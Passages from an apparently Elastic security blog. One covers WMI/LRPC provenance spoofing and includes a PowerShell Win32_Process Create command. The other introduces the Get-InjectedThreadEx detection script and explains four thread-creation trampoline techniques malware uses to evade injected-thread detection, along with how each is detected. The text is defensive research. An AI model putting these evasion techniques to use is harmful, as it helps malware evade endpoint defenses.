PS> ([wmiclass]"ROOT\CIMv2:Win32_Process").Create("calc.exe")

Using SilkETW (or another ETW capture mechanism), we see the following event from the server process:

The server is blindly reporting the values provided by the client. This means that this event cannot be relied upon for un-breaking WMI process provenance trees as the adversary can control the client process id. Falsely reporting this information would be an interesting defense evasion, and a tough one to identify reliably.

Further, a remote adversary can actually pass in a ClientMachine name equal to the local hostname and this WMI event will mistakenly log IsLocal as true. (See the earlier decompilation of InspectWin32ProcessCreateExecution ). This will make the event seem like a suspicious local execution rather than lateral movement, and represents another defence evasion opportunity.

So, this isn’t an approach that other RPC servers should follow after all.

Conclusion

In trying to generically solve LRPC provenance, we unfortunately demonstrate that the one existing LRPC provenance data point is unreliable. This has been reported to Microsoft where it was assessed as a next-version candidate bug that will be evaluated for future releases.

Our fervent hope is that the ultimate solution involves the creation of a documented API that allows a server LRPC thread to determine the client thread of a connection. This would provide endpoint security products with a reliable mechanism to identify operations being proxied through LRPC calls in an attempt to hide their origin.

More generally though, this research highlights the need for defenders to have a detailed understanding of data provenance. It is necessary but not sufficient to know that the data was logged by a trustworthy source such as the kernel or a server process. In addition, you must also understand whether the data was intrinsic to the event or provided by a potentially untrustworthy client. Otherwise adversaries will exploit the gaps.

Get-InjectedThreadEx – Detecting Thread Creation Trampolines

Wed, 07 Dec 2022 00:00:00 GMT

The prevalence of memory resident malware remains extremely high. Defenders have imposed significant costs on file-based techniques, and malware must typically utilize in-memory techniques to avoid detection. In Elastic's recently-published Global Threat Report, defense evasion is the most diverse tactic we observed and represents an area of rapid, continuous innovation.

It is convenient, and sometimes necessary, for memory-resident malware to create its own threads within its surrogate process. Many such threads can be detected with relatively low noise by identifying those which have a start address not backed by a Portable Executable (PE) image file on disk. This detection technique was originally conceived by Elastic's Gabriel Landau and Nicholas Fritts for the Elastic Endgame product. Shortly thereafter, it was released as a PowerShell script for the benefit of the community in the form of Get-InjectedThread with the help of Jared Atkinson and Elastic's Joe Desimone at the 2017 SANS Threat Hunting and IR Summit.

At a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.

However, an adversary often has sufficient control to create a thread with an image-backed start address which will subsequently transfer execution to their unbacked memory. When this transfer is done immediately, it is known as a “trampoline” as you are quickly catapulted somewhere else.

There are four broad classes of trampolines – you can build your own from scratch, you can use an illusionary trampoline, you can repurpose something else as a trampoline, or you can simply find an existing trampoline.

In other words - hooks, hijacks, gadgets and functions.

Each of these will bypass our original unbacked executable memory heuristic.

I highly recommend these two excellent blogs as background:

Understanding and Evading Get-InjectedThread by Adam Chester.
Avoiding Get-InjectedThread for Internal Thread Creation by Christopher Paschen.

In this blog, we will demonstrate how to detect each of these classes of bypass and release an updated PowerShell detection script – Get-InjectedThreadEx.

CreateThread() overview

As a quick recap, the Win32 CreateThread() API lets you specify a pointer to a desired StartAddress which will be used as the entrypoint of a function that takes exactly one user-provided parameter.

So, CreateThread() is effectively a simple shellcode runner.

And its sibling, CreateRemoteThread() is effectively remote process injection.

The value of the lpStartAddress parameter is stored by the kernel in the Win32StartAddress field within the ETHREAD structure for that thread.

This value can be queried from user mode using the documented NtQueryInformationThread() syscall with the ThreadQuerySetWin32StartAddress information class. A subsequent call to VirtualQueryEx() can be used to make a second syscall requesting the basic memory information for that virtual address from the kernel. This includes an enumeration indicating whether the memory is a mapped PE image, a mapped file, or simply private memory.

While the original script was a point-in-time retrospective detection implementation, the same information is available inline during create thread notify kernel callbacks. All effective Endpoint Detection and Response (EDR) products should be providing telemetry of suspicious thread creations.

And all effective Endpoint Protection Platform (EPP) products should be denying suspicious thread creations by default – with a mechanism to add allowlist entries for legitimate software exhibiting this behavior.

In the wild, you’ll see “legitimate” instances of this behavior such as from other security products, anti-cheat software, older copy-protection software and some Unix products that have been shimmed to work on Windows. Though, in each instance, this security code smell may be indicative of software that you might not want in an enterprise environment. The use of these methods may be a leading indicator that other security best practices have not been followed. Even with this finite set of exceptions to handle, this detection and/or prevention approach remains highly relevant and successful today.

1 - Bring your own trampoline

The simplest trampoline is a small hook. The adversary only needs to write the necessary jump instruction into existing image-backed memory. This is the approach that Filip Olszak used to bypass Get-InjectedThread with DripLoader.

These bytes can even be restored to their original values immediately after thread creation. This helps to avoid retrospective detections such as our script – but recall that your endpoint security product should be doing inline detection and will be able to scrutinize the hooked thread entrypoint at execution time, and deny execution if necessary.

The above proof-of-concept hooks ntdll!DbgUiRemoteBreakin, which is a legitimate remote thread start address, though it should rarely be seen in production environments. In practice, the hook can be placed on any function bytes unlikely to be called in normal operation– or even slack space between functions, or at the end of the PE section.

Also note the use of WriteProcessMemory() instead of a simple memcpy(). MEM_IMAGE pages are typically read only, and the former handles toggling the page protections to writable and back for us.

We can detect hooked start addresses fairly easily because we can detect persistent inline hooks fairly easily. In order to save memory, allocations for shared libraries use the same backing physical memory pages and are marked COPY_ON_WRITE in each process’s address space. So, as soon as the hook is inserted, the whole page can no longer be shared. Instead, a copy is created in the working set of the process.

Using the QueryWorkingSetEx() API, we can query the kernel to determine whether the page containing the start address is sharable or is in a private working set.

Now we know that something on the page was modified – but we don’t know if our address was hooked. And, for our updated PowerShell script, this is all that we do. Recall that the bytes can be unhooked after the thread has started– so any further checks on already running threads could result in a false negative.

However, this could also be a false positive if there is a “legitimate” hook or other modification.

In particular, many, many security products still hook ntdll.dll. This was an entirely legitimate technical approach back in 2007 when Vista was released: it allowed existing x86 features based on kernel syscall hooks to be quickly ported to the nascent x64 architecture using user mode syscall hooks instead. The validity of such approaches has been more questionable since Windows 10 was released in 2015. Around this time, x64 was cemented as the primary Windows architecture and we could firmly relegate the less secure x86 Windows to legacy status. The value proposition for user mode hooking was further reduced in 2017 when Windows 10 Creators Update added additional kernel mode instrumentation to provide more robust detection approaches for malicious usage of certain abused syscalls.

For reference, our original Elastic Endgame product has features implemented using user mode hooks whereas our newer Elastic Endpoint has not yet determined a need to use a user mode hook at all in order to attain equal or better protection compared to Endgame. This means that Elastic Endgame must defend these hooks from tampering whereas Elastic Endpoint is currently invulnerable to the various so-called “universal EDR bypasses” that perform ntdll.dll unhooking.

Older security products aside, there are also many products that extend the functionality of other products via hooks– or perhaps unpack their code at runtime, etc. So, if that 4KB page is private, then security products need to additionally compare the start address bytes to an original pristine copy and alert if they differ.

And, to deploy at scale, they also need to maintain an allowlist for those rare legitimate uses.

2 - Shifting the trampoline mat

Technically the security product will only be able to see the bytes at the time of the thread notification callback which is slightly before the thread executes. Malware could create a suspended thread, let the thread callback execute, and only then hook the start bytes before finally resuming the thread. Don’t worry though - effective security products can detect that inline too. But that’s a topic for another day.

This brings us to the second trampoline approach though: hijacking the execution flow before the entrypoint is ever called. Why obviously hook the thread entrypoint of our suspended thread when, with a little sleight of hand, we can usurp execution by modifying its instruction pointer directly (or an equivalent context manipulation) with SetThreadContext(), or by queuing an “early bird” Asynchronous Procedure Call (APC)?

The problem with creating the illusion of a legitimate entrypoint like this is that it doesn’t hold up to any kind of rigorous inspection.

In a normal thread, the user mode start address is typically the third function call in the thread’s stack – after ntdll!RtlUserThreadStart and kernel32!BaseThreadInitThunk. So when the thread has been hijacked, this is going to be obvious in the call stack.

For instruction pointer manipulation, the first frame will belong to the injected code.

For “early bird” APC injection, the base of the call stack will be ntdll!LdrInitializeThunk, ntdll!NtTestAlert, ntdll!KiUserApcDispatcher and then the injected code.

The updated script detects various anomalous call stack bases.

False positives are possible where legitimate software finds it necessary to modify Windows process or thread initialisation. For example, this was observed with the MSYS2 Linux environment. There is also an edge case where a function might have been generated with a Tail Call Optimisation (TCO), which eliminates unnecessary stack frames for performance. However, these cases can all be easily handled with a small exception list.

3 - If it walks like a trampoline, and it talks like a trampoline...

The third trampoline approach is to find a suitable gadget within image-backed memory so that no code modification is necessary. This is one of the approaches that Adam Chester employed in his blog.

Our earlier hook was 12 bytes and finding an exact 12-byte gadget is unlikely in practice.

However, on x64 Windows, functions use a four-register fast-call calling convention by default. So when the OS calls our gadget we will have control over the RCX register which will contain the parameter we passed into CreateThread().

The simplest x64 gadget is the two-byte JMP RCX instruction “ff e1” – which is fairly trivial to find.

Gadgets don’t even need to be instructions per se – they could be within operands or other data in the code section. For example, the above “ff e1” gadget in ntdll.dll was part of the relative address of a GUID.

We can detect this too- because it doesn’t work generically yet.

In all modern Windows software, thread start addresses are protected by Control Flow Guard (CFG) which has a bitmap of valid indirect call targets computed at compile time. In order to use this gadget, malware must either first disable CFG or call the SetProcessValidCallTargets() function to ask the kernel to dynamically set the bit corresponding to this gadget in the CFG bitmap.

Just to be clear: this is not a CFG bypass. It is a CFG feature to support legitimate software doing weird things. Remember that CFG is an exploit protection– and being able to call SetProcessCallTargets() in order to call CreateThread() is a chicken and egg problem for exploit developers.

Like before, to save memory, the CFG bitmap pages for DLLs are also shared between processes. This time we can detect whether the start address’s CFG bitmap entry is on a sharable page or in a private working set- and alert if it is private.

Control Flow Guard is described in detail elsewhere, but a high level CFG overview here is helpful to understanding our approach to detection. Each two bits in the CFG bitmap corresponds to 16 addresses. Two bits gives us four states. Specifically, in a pretty neat optimization by Microsoft, two states correspond only to the 16-byte aligned address (allowed, and export suppressed) and two states correspond to all 16 addresses (allowed and denied).

Modern CPUs fetch instructions in 16-byte lines so modern compilers typically align the vast majority of function entrypoints to 16-bytes. The vast majority of CFG entries only set a single address as a valid indirect call target, and very few entries will specify a whole block of 16 addresses as valid call targets. This means that the CFG bitmap can be an eighth of the size without any appreciable increase in the risk of valid gadgets due to an overly permissive bitmap.

However, if each two bits corresponds to 16 addresses, then a private 4K page of CFG bits corresponds to 256KB of code. That’s quite the false positive potential!

Therefore, we just have to hope that legitimate code never does this… nevermind. You should never hope that legitimate code won’t do obscure things. To date, we’ve identified three contemporary scenarios:

The legacy Edge browser would harden its javascript host process by un-setting CFG bits for certain abusable functions
user32.dll appears to be too kind to legacy software – and will un-suppress export addresses if they are registered as call back functions
Some security products will drop a page of hook trampolines too close to legitimate modules and private executable memory always has private bitmap entries (Actually they’ll often drop this at a module’s preferred load address – which prevents the OS from sharing memory for that module)

So we need to rule out false positives by comparing against an expected CFG bitmap value. We could read this from the PE file on disk, but the x64 bitmap is already mapped into our process as part of the shared CFG bitmap.

The PowerShell script implementation we’ve released alerts on both cases: a modified CFG page and a start address with a non-original CFG value.

A very small number of CFG-compatible gadgets might exist at a given point in time, but only in very specific DLLs that will likely appear anomalous in the surrogate process.

4 - It's literally already a trampoline

The third bypass category is to find an existing function that does exactly what we want, and there are many of these. For example, the one highlighted by Christopher Paschen is Microsoft’s C Runtime (CRT). This implementation of the C standard library works as an API layer that sits above Win32– and it includes thread creation APIs.

These APIs perform some extra CRT bookkeeping on thread creation/destruction by passing an internal CRT thread entrypoint to CreateThread() and by passing the user entrypoint to subsequently call as part of the structure pointed to by the CreateThread() parameter.

So, in this case, the Win32StartAddress observed will be the non-exported msvcrt!_startthread(ex). The shellcode address will be at a specific offset from the thread parameter during thread creation (Microsoft CRT source is available), and the shellcode will be the next frame on the call stack after the CRT.

Note: without additional tricks this can only be used to create in-process threads and there is no CreateRemoteThread() equivalent. Those tricks exist, however, and you should not expect this module as a start address in remote threads.

Unfortunately, there is no operating system bookkeeping that will tell you if a thread was created remotely after the fact. Consequently, we can’t scan for this with our script– but the inline callbacks used by security products can make this distinction.

Currently, the script simply traverses the stack bottom-up and infers the first handful of frames by looking at candidate return addresses. This code could definitely be improved via disassembly or using unwind information, which are less rewarding to implement in PowerShell. The current approach is reliable enough for demonstration purposes:

The updated script detects the original suspicious thread in addition to the four classes of bypass described in this research.

Hunting suspicious thread creations

In addition to detections for the four known major classes of thread start address trampolines, the updated script also includes some additional heuristics. Some of these have medium false positive rates and are hidden behind an -Aggressive flag. However, they may still be useful in hunting scenarios.

![prolog byte regex](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image14.png

The first looks at the starting bytes of the thread’s user entrypoint. Function prologs have structure- except when they don’t. There is no decompiler in PowerShell as far as we know – so we approximated with a byte pattern regular expression instead. Identifying code that doesn’t follow convention is useful but could easily exist in a compiler that we haven’t tested against.

Interestingly, we had to account for the “MZ” magic bytes that correspond to a DOS Executable being a purportedly valid thread entrypoint. The Windows loader ignores the value of the AddressOfEntry field in the PE header for Common Language Runtime (CLR) executables such as .NET.

Instead, execution always starts in MsCorEE!_CorExeMain() in the CLR Runtime which determines the actual process entrypoint from the CLR metadata. This makes sense as CLR assembly might only contain bytecode which needs to be JIT’d by the runtime before being called. However, the value of this field is still passed to CreateThread() and it is often zero- which results in the unexpected MZ entrypoint bytes.

The second heuristic examines the bytes immediately preceding the user entrypoint. This is usually a return, a jump, or a filler byte. Common filler bytes are zero, nop, and int 3. However, this is only a convention.

In particular, older compilers would regularly place data side by side with code- presumably to achieve performance through data locality. For example, we previously analysed the x64 binaries on Microsoft’s symbol server and noticed that this mixing of code and data was normal in Visual Studio 2012, was mostly remediated in VS2013, and appears to have been finally fixed in VS2015 Update 2.

The third heuristic is yet another compiler convention. As mentioned earlier, compilers like to output functions that maximize the instruction cache performance which typically use 16-byte fetches. But compilers appear to also like to save space– so they typically only ensure that the first basic block fits within the smallest number of 16-byte lines as opposed to strict 16-byte alignment. In other words, if a basic block is 20 bytes then it’ll always need at least two fetches, but we want to ensure that it doesn’t need three.

Many common Win32 modules have no valid thread entrypoints at all– so check for these.

This list is definitely non-exhaustive.

Kernel32.dll is a special case. LoadLibrary is not technically a valid thread entrypoint– but CreateRemoteThread(kernel32!LoadLibraryA, “signed.dll”) is actually how most security products would prefer software to do code injection into running processes when necessary. That is, the injected code is signed and loaded into read-only image-backed memory. To the best of our knowledge, we believe that this approach was first proposed by Jeffrey Richter in an article in the May 1994 edition of the Microsoft System Journal and later included in his Advanced Windows book. So treat LoadLibrary as suspicious- but not necessarily malicious.

ntdll.dll is loaded everywhere so is often the first choice for a gadget or hook. There are only four valid ntdll entrypoints that we know of and the script explicitly checks for these.

Two of these functions aren’t exported, and rather than using P/Invoke to download the public symbols and find the offset in the PDB, the script dynamically queries the start addresses of its own threads for their start addresses to find these. PowerShell already uses worker threads, and the script starts a private ETW logger session to force a thread with the final address.

Side-loaded DLLs remain a highly popular technique- and are still predominantly unsigned.

This one isn’t a thread start heuristic- but it was too simple not to include. Legitimate threads might impersonate SYSTEM briefly, but (lazy) malware authors (or operators) tend to escalate privileges initially and hold them indefinitely.

Wrapping up

As flagged last time, nothing in security is a silver bullet. You should not expect 100% detection from suspicious thread creations alone.

For example, an adversary could modify their tools to simply not create any new threads, restricting their execution to hijacked threads only. The distinction is perhaps subtle, but Get-InjectedThreadEx only attempts to detect anomalous thread creation addresses – not the broader case of legitimate threads that were subsequently hijacked. This is why, in addition to imposing costs at thread creation, Elastic Security employs other defensive layers including memory signatures, behavioral detections and defense evasion detections.

While it is somewhat easy to hijack a single thread after creation (ensuring that all your malware’s threads, including any third-party payloads, uses the right version of the right detection bypass for the installed security products), this is a maintenance cost for the adversary and mistakes will be made.

Let’s keep raising the bar. We’d love to hear about thread creation bypasses- and scalable detection approaches. We’re stronger together.